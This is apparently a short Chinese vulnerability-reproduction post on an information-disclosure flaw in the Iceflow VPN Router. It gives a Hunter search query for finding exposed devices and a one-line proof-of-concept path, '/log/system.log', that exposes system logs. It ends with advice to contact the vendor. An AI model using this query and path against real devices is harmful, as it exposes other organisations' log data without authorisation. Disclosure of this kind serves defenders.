【漏洞复现】上海冰峰ICEFLOW VPN信息泄露漏洞

 Nx01 产品简介

        上海冰峰计算机网络技术有限公司是国内VPN、流量管理、行为管理、链路负载均衡、下一代防火墙设备供应商和IT价值解决方案提供商。冰峰网络reporter系统是一套数据报表管理系统。

Nx02 漏洞描述

        上海冰峰计算机网络技术有限公司ICEFLOW VPN Router系统存在信息泄露漏洞。攻击者可通过该漏洞获取系统日志信息。

Nx03 产品主页

hunter-query: body="上海冰峰计算机网络技术有限公司"

【漏洞复现】上海冰峰ICEFLOW VPN信息泄露漏洞_第1张图片

Nx04 漏洞复现

POC:

/log/system.log

【漏洞复现】上海冰峰ICEFLOW VPN信息泄露漏洞_第2张图片

Nx05 修复建议

建议联系软件厂商进行处理。

你可能感兴趣的:(【漏洞复现】,web安全)